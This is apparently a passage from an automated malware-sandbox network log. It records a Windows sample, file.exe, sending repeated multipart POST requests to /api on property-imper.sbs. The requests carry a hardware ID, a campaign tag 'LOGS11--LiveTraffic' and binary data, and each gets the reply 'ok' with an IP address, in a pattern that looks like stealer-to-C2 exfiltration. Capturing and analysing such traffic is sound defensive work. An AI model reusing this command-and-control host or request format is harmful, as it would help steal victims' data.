2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 30 78 6e 34 48 65 63 74 76 51 33 63 78 52 51 30 37 57 56 43 6a 36 31 70 62 4e 33 68 42 47 49 75 65 7a 56 6d 52 61 69 4b 68 50 50 5a 41 61 70 4e 72 41 57 39 44 39 44 41 44 33 76 58 4b 46 66 4f 74 79 6c 73 32 36 74 54 4b 43 4a 7a 4f 32 4e 4f 70 38 6e 43 75 4d 77 5a 2b 42 50 68 49 36 6f 5a 30 73 49 54 4f 76 39 69 52 6f 61 74 59 47 44 65 37 67 78 73 61 6a 68 34 5a 31 33 6f 6b 6f 71 53 30 78 4c 6d 48 2f 73 6d 2b 41 43 5a 31 56 6b 2b 34 53 67 51 77 4b 70 6f 62 39 62 76 42 57 59 75 65 6a 35 75 53 4b 66 4d 77 4c 50 5a 45 2b 49 64 37 53 75 7a 45 4e 66 4a 46 44 33 72 5a 45 6d 46 37 69 63 72 30 50 4e 4c 4d 47 70 59 50 32 4e 58 36 76 2f 4a 76 64 41 65 2f 46 58 7a 61 4b 46 66 30 4d 42 5a 59 61 31 6d 54 59 2b 38 61 48 6e 53 35 52 6c 6b 4c 33 41 31 59 30 75 6f 7a 38 32
  Data Ascii: 0xn4HectvQ3cxRQ07WVCj61pbN3hBGIuezVmRaiKhPPZAapNrAW9D9DAD3vXKFfOtyls26tTKCJzO2NOp8nCuMwZ+BPhI6oZ0sITOv9iRoatYGDe7gxsajh4Z13okoqS0xLmH/sm+ACZ1Vk+4SgQwKpob9bvBWYuej5uSKfMwLPZE+Id7SuzENfJFD3rZEmF7icr0PNLMGpYP2NX6v/JvdAe/FXzaKFf0MBZYa1mTY+8aHnS5RlkL3A1Y0uoz82
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 46 58 7a 61 4b 46 66 30 4d 42 5a 59 61 31 6b 51 59 43 6c 59 32 2f 58 37 41 5a 74 4b 58 45 37 62 55 4b 69 78 4d 32 33 30 68 44 6e 45 2b 77 68 76 42 72 46 79 52 41 31 34 53 67 47 77 4b 6c 78 4b 34 2b 72 4a 47 38 38 64 52 64 6a 56 4b 47 4b 31 66 33 48 57 65 30 5a 72 48 37 34 47 4e 4c 45 45 6a 2f 6c 61 46 71 46 6f 47 4a 71 33 65 30 4b 5a 53 5a 77 4f 47 46 46 72 73 62 4b 74 4e 6b 4c 2b 42 44 71 4e 4c 4a 66 6d 59 77 65 49 61 30 77 43 4c 61 2b 66 6e 72 42 71 54 35 72 4a 48 67 2f 64 67 57 33 68 4e 50 7a 32 52 57 71 54 61 77 74 75 42 50 51 78 42 38 39 35 57 64 48 69 62 78 6f 5a 39 6e 35 44 47 67 6a 65 44 64 73 54 4b 58 4e 78 37 6a 55 46 4f 34 53 37 57 62 32 58 39 44 55 57 57 47 74 58 6c 69 4e 6f 6b 64 67 32 2b 4a 4c 64 32 52 76 65 47 64 4a 36 4a 4b 4b 74 39 49 52
  Data Ascii: FXzaKFf0MBZYa1kQYClY2/X7AZtKXE7bUKixM230hDnE+whvBrFyRA14SgGwKlxK4+rJG88dRdjVKGK1f3HWe0ZrH74GNLEEj/laFqFoGJq3e0KZSZwOGFFrsbKtNkL+BDqNLJfmYweIa0wCLa+fnrBqT5rJHg/dgW3hNPz2RWqTawtuBPQxB895WdHibxoZ9n5DGgjeDdsTKXNx7jUFO4S7Wb2X9DUWWGtXliNokdg2+JLd2RveGdJ6JKKt9IR
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 4f 39 47 39 44 49 48 7a 61 74 4a 67 69 48 74 69 6b 7a 6c 38 51 73 58 57 68 58 41 69 42 61 35 74 4f 4b 74 4e 4a 5a 73 6c 58 67 4a 62 51 58 32 4d 6f 51 4e 65 64 68 51 34 79 6c 62 57 66 65 37 67 31 70 4c 33 4d 35 5a 45 6d 69 7a 4d 6d 77 30 52 62 6c 48 61 78 6f 2b 42 6a 50 6a 45 46 35 79 48 39 44 6a 71 67 70 64 4a 6e 79 53 32 38 6d 4e 6d 41 67 53 61 48 4d 7a 4c 62 53 47 4f 77 64 36 53 36 38 48 74 48 4b 47 6a 62 70 62 55 6d 50 71 6d 56 6c 33 65 6f 4b 5a 43 46 35 4d 32 55 46 35 6f 72 4e 71 35 35 42 71 69 54 76 4d 4b 38 50 32 34 77 47 64 2f 51 6f 54 34 7a 75 4d 53 76 57 2b 51 46 69 4a 48 4d 33 5a 55 61 6e 7a 63 65 31 30 68 50 6a 48 65 6f 70 73 51 33 55 77 42 63 2b 34 32 52 47 6a 61 52 71 5a 70 65 6c 53 32 38 79 4e 6d 41 67 61 61 2f 48 35 4c 6a 53 48 71 6f 4b 6f
  Data Ascii: O9G9DIHzatJgiHtikzl8QsXWhXAiBa5tOKtNJZslXgJbQX2MoQNedhQ4ylbWfe7g1pL3M5ZEmizMmw0RblHaxo+BjPjEF5yH9DjqgpdJnyS28mNmAgSaHMzLbSGOwd6S68HtHKGjbpbUmPqmVl3eoKZCF5M2UF5orNq55BqiTvMK8P24wGd/QoT4zuMSvW+QFiJHM3ZUanzce10hPjHeopsQ3UwBc+42RGjaRqZpelS28yNmAgaa/H5LjSHqoKo
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 58 79 77 46 35 74 53 68 2b 68 37 35 35 61 4a 58 61 48 57 73 38 66 54 56 73 42 62 65 45 30 2f 50 5a 46 61 70 4e 72 43 43 33 46 74 54 44 47 44 44 68 5a 55 32 4a 71 32 68 74 30 2b 45 42 61 43 78 77 4f 57 56 50 71 38 76 41 75 74 6b 52 37 52 62 2b 5a 76 5a 66 30 4e 52 5a 59 61 31 42 54 35 4b 67 65 53 76 49 70 52 49 6f 4c 58 70 34 4f 41 57 73 77 4d 57 33 32 52 58 73 45 4f 6f 72 75 52 44 57 7a 42 59 39 35 6d 46 4f 67 61 4e 73 5a 74 50 35 41 57 4d 6c 65 6a 46 73 53 4f 69 45 69 72 54 47 57 62 4a 56 33 53 75 32 45 64 44 61 57 53 61 6a 63 51 69 48 6f 69 6b 7a 6c 2b 6f 48 5a 79 6c 35 4f 32 4e 45 6f 74 6a 59 76 39 63 52 37 78 6e 6e 4b 4c 34 4e 30 63 4d 51 4f 75 35 68 54 34 69 69 59 32 6a 51 71 30 55 6f 4c 57 35 34 4f 41 57 4c 33 64 71 2b 6e 67 61 6b 44 4b 77 68 74 46
  Data Ascii: XywF5tSh+h755aJXaHWs8fTVsBbeE0/PZFapNrCC3FtTDGDDhZU2Jq2ht0+EBaCxwOWVPq8vAutkR7Rb+ZvZf0NRZYa1BT5KgeSvIpRIoLXp4OAWswMW32RXsEOoruRDWzBY95mFOgaNsZtP5AWMlejFsSOiEirTGWbJV3Su2EdDaWSajcQiHoikzl+oHZyl5O2NEotjYv9cR7xnnKL4N0cMQOu5hT4iiY2jQq0UoLW54OAWL3dq+ngakDKwhtF
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 4b 2b 68 75 52 34 2b 6e 59 47 2f 66 36 41 74 73 4c 6e 45 39 59 30 6d 6a 7a 63 6d 38 32 68 44 6b 48 4f 4e 6d 39 6c 2f 51 31 46 6c 68 72 55 6c 54 67 36 4a 6b 4b 38 69 6c 45 69 67 74 65 6e 67 34 42 61 54 45 7a 37 50 55 48 2b 34 51 36 69 79 39 48 39 7a 50 46 6a 33 72 62 45 65 41 70 57 42 71 30 65 34 42 59 79 78 37 4f 32 5a 44 36 49 53 4b 74 4d 5a 5a 73 6c 58 4d 50 62 55 54 30 49 77 47 64 2f 51 6f 54 34 7a 75 4d 53 76 63 35 77 39 76 4b 6e 73 37 61 45 43 73 77 4d 2b 7a 31 67 76 69 46 65 73 30 71 68 2f 65 79 52 55 36 37 57 78 4f 69 61 68 71 62 35 65 6c 53 32 38 79 4e 6d 41 67 61 4b 54 4e 34 37 54 46 57 66 56 62 39 57 61 2f 45 35 65 55 57 54 6a 6d 59 6b 65 4e 72 57 39 6f 33 4f 34 42 61 53 31 2b 4e 58 4a 47 70 38 58 4f 73 39 45 66 37 42 54 6a 49 4c 38 57 31 73 51
  Data Ascii: K+huR4+nYG/f6AtsLnE9Y0mjzcm82hDkHONm9l/Q1FlhrUlTg6JkK8ilEigteng4BaTEz7PUH+4Q6iy9H9zPFj3rbEeApWBq0e4BYyx7O2ZD6ISKtMZZslXMPbUT0IwGd/QoT4zuMSvc5w9vKns7aECswM+z1gviFes0qh/eyRU67WxOiahqb5elS28yNmAgaKTN47TFWfVb9Wa/E5eUWTjmYkeNrW9o3O4BaS1+NXJGp8XOs9Ef7BTjIL8W1sQ
2024-11-23 12:57:36 UTC | 364 | IN | Data Raw: 6e 61 6e 75 47 4e 73 78 2b 77 63 5a 32 6f 34 65 47 38 46 38 50 4f 4b 75 74 6b 43 2b 77 50 68 4e 72 39 66 36 49 4a 5a 49 61 30 77 43 4c 57 74 5a 32 58 51 2f 52 6f 6c 44 57 41 79 5a 31 57 76 33 63 58 7a 6b 46 6e 73 56 62 52 31 39 6c 2f 54 33 56 6c 68 76 54 6f 54 31 66 30 2b 4f 34 58 30 52 58 46 71 59 48 67 34 46 2b 61 4b 32 50 4f 47 57 61 30 57 2f 6a 53 2b 48 4d 48 50 58 67 66 54 54 31 4b 4e 71 48 35 36 36 64 55 4d 63 69 64 77 4c 33 45 4a 76 63 6e 45 76 64 6b 50 71 6c 75 73 4b 66 68 48 37 6f 78 52 65 64 49 6d 43 4a 6a 75 4d 53 76 69 36 41 56 6d 4c 57 41 70 4c 57 4b 79 78 38 79 6b 7a 31 6d 6b 56 65 70 6d 34 45 2b 5a 6a 42 30 6f 72 54 41 59 30 76 55 38 4f 49 43 37 57 58 64 6b 62 33 68 32 42 66 43 59 68 50 50 4d 57 62 4a 56 71 79 57 71 44 64 48 50 44 7a 71 71
  Data Ascii: nanuGNsx+wcZ2o4eG8F8POKutkC+wPhNr9f6IJZIa0wCLWtZ2XQ/RolDWAyZ1Wv3cXzkFnsVbR19l/T3VlhvToT1f0+O4X0RXFqYHg4F+aK2POGWa0W/jS+HMHPXgfTT1KNqH566dUMcidwL3EJvcnEvdkPqlusKfhH7oxRedImCJjuMSvi6AVmLWApLWKyx8ykz1mkVepm4E+ZjB0orTAY0vU8OIC7WXdkb3h2BfCYhPPMWbJVqyWqDdHPDzqq
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 32 36 65 39 0d 0a 59 69 75 75 65 58 75 6b 48 2f 69 43 37 43 64 53 4c 4a 77 66 75 66 6b 57 50 70 57 68 56 36 63 55 47 61 53 6c 34 65 6c 46 54 70 64 72 4a 74 74 6b 6e 31 42 76 72 4d 72 38 52 30 63 78 5a 64 36 31 6e 43 4e 69 58 4b 53 4f 58 31 45 55 6f 4d 6a 5a 67 49 48 43 72 78 4d 53 30 79 41 69 6e 4e 76 6f 72 74 78 54 57 6a 46 64 35 36 79 67 51 30 4f 41 70 62 38 61 72 55 7a 68 34 4c 57 30 7a 45 76 69 59 31 66 33 48 57 66 78 56 74 48 54 32 58 38 57 4d 51 58 6d 71 5a 6b 57 42 72 57 64 6f 78 66 6b 4e 61 7a 78 31 66 31 35 37 69 63 66 42 76 39 4d 57 34 53 76 53 42 37 55 55 32 38 45 57 4d 74 4e 57 58 59 4f 67 5a 32 7a 42 2b 6b 73 6d 61 6e 6c 34 4f 48 7a 6f 67 6f 71 4d 6b 46 6e 79 56 62 52 6d 6a 52 7a 5a 77 68 34 76 2f 43 56 70 6a 61 56 6c 5a 74 6a 67 53 79 5a 71
  Data Ascii: 26e9YiuueXukH/iC7CdSLJwfufkWPpWhV6cUGaSl4elFTpdrJttkn1BvrMr8R0cxZd61nCNiXKSOX1EUoMjZgIHCrxMS0yAinNvortxTWjFd56ygQ0OApb8arUzh4LW0zEviY1f3HWfxVtHT2X8WMQXmqZkWBrWdoxfkNazx1f157icfBv9MW4SvSB7UU28EWMtNWXYOgZ2zB+ksmanl4OHzogoqMkFnyVbRmjRzZwh4v/CVpjaVlZtjgSyZq
2024-11-23 12:57:36 UTC | 1369 | IN | Data Raw: 4f 72 6a 66 53 4e 2b 77 37 70 42 65 6f 6c 68 69 48 38 77 42 38 2b 39 32 39 4f 70 6f 34 70 4a 5a 66 6b 53 7a 41 54 4e 6e 41 67 65 75 61 4b 30 76 4f 47 57 64 38 57 34 69 69 2f 43 63 61 42 50 43 37 75 65 45 36 44 37 69 63 72 30 61 74 54 4f 47 51 32 50 48 45 46 38 4a 71 59 36 49 74 4b 76 55 57 2b 4f 66 59 47 6c 39 70 5a 59 62 38 6d 43 4a 4c 75 4d 53 75 51 36 42 6c 36 4c 48 55 75 59 77 4b 57 39 4f 79 77 7a 78 50 4c 47 50 77 68 68 69 48 43 7a 78 63 33 36 6e 35 5a 77 4f 41 70 5a 4a 65 7a 4d 69 68 69 4f 6a 35 6a 55 2b 6a 31 68 50 50 47 57 62 4a 56 32 53 57 32 45 64 44 61 43 48 54 4c 61 31 6d 4b 6a 32 52 37 30 4b 74 46 4b 43 77 32 59 44 4d 4c 36 4d 37 62 38 34 5a 4a 75 45 36 35 64 65 39 50 68 64 4e 58 49 4b 31 2b 43 4e 6a 38 4a 79 76 46 71 31 4d 6f 62 58 55 71 63
  Data Ascii: OrjfSN+w7pBeolhiH8wB8+929Opo4pJZfkSzATNnAgeuaK0vOGWd8W4ii/CcaBPC7ueE6D7icr0atTOGQ2PHEF8JqY6ItKvUW+OfYGl9pZYb8mCJLuMSuQ6Bl6LHUuYwKW9OywzxPLGPwhhiHCzxc36n5ZwOApZJezMihiOj5jU+j1hPPGWbJV2SW2EdDaCHTLa1mKj2R70KtFKCw2YDML6M7b84ZJuE65de9PhdNXIK1+CNj8JyvFq1MobXUqc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49710 | 104.21.33.116 | 443 | 4392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 12:57:38 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=8YZHJO8XC3M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12823
Host: property-imper.sbs
2024-11-23 12:57:38 UTC | 12823 | OUT | Data Raw: 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 59 5a 48 4a 4f 38 58 43 33 4d
Data Ascii: --8YZHJO8XC3MContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--8YZHJO8XC3MContent-Disposition: form-data; name="pid"2--8YZHJO8XC3MContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8YZHJO8XC3M
2024-11-23 12:57:39 UTC | 1021 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 12:57:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fug2v7d0rk3v5265fdmkl98ju3; expires=Wed, 19-Mar-2025 06:44:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkrVfA3RePtXPEZYkidFcoXJeOSs4oVIBZ%2F%2F8jEYIWIaw6Eg3cLelak1fcJazUTNXpBqd36ap7Dq6NAdRQZ5M%2Bhfwbq6n58IpeIG3%2BNhOFqL%2FCKcxfG8VgamAclqJi5Gky55xwQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e71537ecd818c12-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1765&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13758&delivery_rate=1573275&cwnd=177&unsent_bytes=0&cid=afeeb65b4791d41b&ts=852&x=0"
2024-11-23 12:57:39 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-23 12:57:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49712 | 104.21.33.116 | 443 | 4392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 12:57:40 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=D5KV57W0M5CL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15075
Host: property-imper.sbs
2024-11-23 12:57:40 UTC | 15075 | OUT | Data Raw: 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 35 4b 56 35 37 57 30
Data Ascii: --D5KV57W0M5CLContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--D5KV57W0M5CLContent-Disposition: form-data; name="pid"2--D5KV57W0M5CLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--D5KV57W0
2024-11-23 12:57:41 UTC | 1018 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 12:57:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lpqvupdi3j8gdtn2cl9na6r39m; expires=Wed, 19-Mar-2025 06:44:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTAnY83BjGVSmiunpI%2FPMkAHHTfdrIPwLPL6ZivPylK6mbv1QGpIAK%2BqBK%2Fdr1gFBCi3QrSHMQ93Lar3S1dvk2E0qRoepSrSaG8vThzTYLTGX3WuJa%2B4dnL2GxREBq2X79HT9Xk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e71538ccfda4223-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1569&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16011&delivery_rate=1794714&cwnd=205&unsent_bytes=0&cid=0cc9861d7bd2bc66&ts=948&x=0"
2024-11-23 12:57:41 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-23 12:57:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49713 | 104.21.33.116 | 443 | 4392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 12:57:42 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WO1UNFDP146E3A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19945
Host: property-imper.sbs
2024-11-23 12:57:42 UTC | 15331 | OUT | Data Raw: 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 4f
Data Ascii: --WO1UNFDP146E3AContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--WO1UNFDP146E3AContent-Disposition: form-data; name="pid"3--WO1UNFDP146E3AContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WO
2024-11-23 12:57:42 UTC | 4614 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00
Data Ascii: +?2+?2+?o?Mp5p_oI
2024-11-23 12:57:43 UTC | 1023 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 12:57:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7livmo56jt3l4l3uhjnag16ikd; expires=Wed, 19-Mar-2025 06:44:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXh6PPpE24qQu1S4Zyz9vGYvOVrqgzRuI4geVoM33nbRPo%2FMYvEeMrA6DNmNnYIP97xZf7%2BGZCH3jtUOg5xilt%2BfEb%2Fi6gutpXUUr6hx9qzDfEbrMt6w2rTMsYTr159rq%2BKS%2FFM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e71539bdebd19cf-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20905&delivery_rate=1599123&cwnd=252&unsent_bytes=0&cid=04083f2902e6eed7&ts=885&x=0"
2024-11-23 12:57:43 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-23 12:57:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49720 | 104.21.33.116 | 443 | 4392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 12:57:45 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=30X3QL46
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1170
Host: property-imper.sbs
2024-11-23 12:57:45 UTC | 1170 | OUT | Data Raw: 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
Data Ascii: --30X3QL46Content-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--30X3QL46Content-Disposition: form-data; name="pid"1--30X3QL46Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--30X3QL46Content-Di
2024-11-23 12:57:46 UTC | 1041 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 12:57:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3frabesihjk8358doimj5io91a; expires=Wed, 19-Mar-2025 06:44:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6%2Bj8JbIChVmGqLyDRlvUBhqYQuxaZ7AjagprhMdfKseoGcuGLLGnJIYC0n2p6OHhwn2Hd2xrKFK8xg19lfAb%2Fx10PCySs4YUyqfQyWbIR2%2BBlPSFvRkPxg%2B1Ezx0XZNq9S717w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e7153ad8f2d3342-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1818&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2079&delivery_rate=1574973&cwnd=150&unsent_bytes=0&cid=b6955bc00eddebd2&ts=603&x=0"
